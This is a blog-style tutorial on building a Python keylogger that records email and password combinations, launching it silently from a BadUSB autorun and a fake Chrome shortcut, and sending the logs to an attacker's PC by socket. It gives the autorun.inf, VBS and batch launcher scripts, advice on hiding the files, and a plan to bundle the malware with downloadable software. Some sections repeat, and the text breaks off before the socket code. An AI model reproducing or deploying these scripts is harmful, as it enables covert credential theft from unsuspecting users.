PythonKeylogger- BadUSB + ChromeVirus

6 min readJan 6, 2021

This program is used to record email id and password combinations so that the hacker could easily exploit the data.
Keylogger- A Keylogger is a program that records activity of the target. In simple words Keylogger program records all the keys pressed on keyboard. Not only does it record keys from the physical keyboard but also from virtual/on-screen keyboards.
Bad USB- Bad USB is a physical pendrive when plugged in executes some malware files/program. Here we are executing our keylogger file on USB plugin.
Virus- A program that when executed makes modifies or read some files without the user knowing is called virus. Here we are going to attach our virus file (i.e Keylogger) to chrome application so when chrome is executed the virus also executes in the background.

WHY MAKE THIS / REAL-LIFE IMPLEMENTATION :

Since in the so called 21st century almost all life tasks are carried on digitally. However it hasn’t been more simpler for a hacker to exploit users. It is very important to spread awareness about one of the method of data stealing.

TECHNOLOGY USED :

Python, Portable Python (PyWin32/ PyWin64), Visual Basic Scripting, Socket Programming, USB device.

PROCEDURE :

We first code a keylogger file in Python. Once the keylogger program is created we have two
implementation methods — 1) Hardware Access 2) Software Access

1) Hardware Access — In this method of implementation we require a physical hardware device. In this case we need a USB drive.

2) Software Access- — In this method of implementation we will not require a physical hardware device, we can attach our virus to any program/application.

Keylogger Program- To create a keylogger program we need to install python firstly. An external library “Pynput” is required to record keystrokes. Pynput can be installed just by running command prompt as administrator and pasting a command : pip3 install pynput

INTRODUCTION :

WHY MAKE THIS / REAL-LIFE IMPLEMENTATION :

TECHNOLOGY USED :

Python, Portable Python (PyWin32/ PyWin64), Visual Basic Scripting, Socket Programming, USB device.

PROCEDURE :

We first code a keylogger file in Python. Once the keylogger program is created we have two
implementation methods — 1) Hardware Access 2) Software Access

1) Hardware Access — In this method of implementation we require a physical hardware device. In this case we need a USB drive.

2) Software Access- — In this method of implementation we will not require a physical hardware device, we can attach our virus to any program/application.

Now create a new file and paste the following code :

Save the file with extension as .pyw, to run is silently in the
background without the user knowing.
Here, on_press() method is triggered when a key is pressed. The key is
appended in a list called keys. We have a method called on_release()
which detects if esc key is pressed. If yes the program would be
terminated. Also we have a count variable which will trigger another user
defined method called write_file(). This method will write all the
recorded keystroked into a text file called log.txt.

Bad USB- The USB has to be added with some scripts that autoruns when a
USB is plugged in. However before that we need to make python portable
since not every computer will have python installed. So for that we will
add portable python (i.e WinPython64 or WinPython64) files to the USB.

Here firstly we create an autorun file which would then automatically trigger a visual basic script file when the usb is plugged in. This vbs file then triggers 2 more windows batch files containing a trigger for keylogger program and a trigger for socket programming file.

Paste the following codes

Autorun.inf :
[autorun]
open=abc.vbs

abc.vbs :
Set WshShell = CreateObject(“WScript.Shell”)
WshShell.Run chr(34) & “I:\start.bat” & Chr(34), 0
Set WshShell = Nothing
Wscript.sleep 10000
Set WshShell = CreateObject(“WScript.Shell”)
WshShell.Run chr(34) & “I:\server.bat” & Chr(34), 0
Set WshShell = Nothing

Here, We are creating a WshShell object eveytime we want to
trigger a file, then we add filename along with location. Most
importantly we set WshShell to Nothing since we want our files
to run in background. Also since we want a delay of 10seconds
between execution of files we add the line Wscript.sleep
10000, where 10000 is time in milliseconds.

start.bat :
@echo off
python try4.pyw

server.bat :
@echo off
python server.py

The @echo off line ensures that the files are executed in the
background.
Also for added security we can hide these files by selecting
all files -> right click -> properties -> tick the Hidden
property.

Chrome Virus:
Create a desktop shortcut of the chrome application from the
path C:\Program Files(x86)\Google\Chrome\Application

Then create a windows batch file (.bat) file with the
following code:
@echo off
start “” “C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe”
pushd %~dp0
cscript abc.vbs

This would trigger the chrome application and the the abc.vbs
script which would the trigger keylogger and socket python
files.
A possible way on implementing this is one can upload a
software and add the malware files with the software file, now
when the target downloads the software and executes it the
keylogger would also get executed.

Socket Programming :
When the keylogger would be executed it would generate a
log.txt file which has all the recorded keystrokes. However
this log file will be present on the target pc and not the
hacker’s pc. Here socket programming come into place. The log
file is transferred from the target to hacker’s pc with help
of socket programming.
We have 2 Files for Socket programming 1) Server side
2) Client side

Serverside.py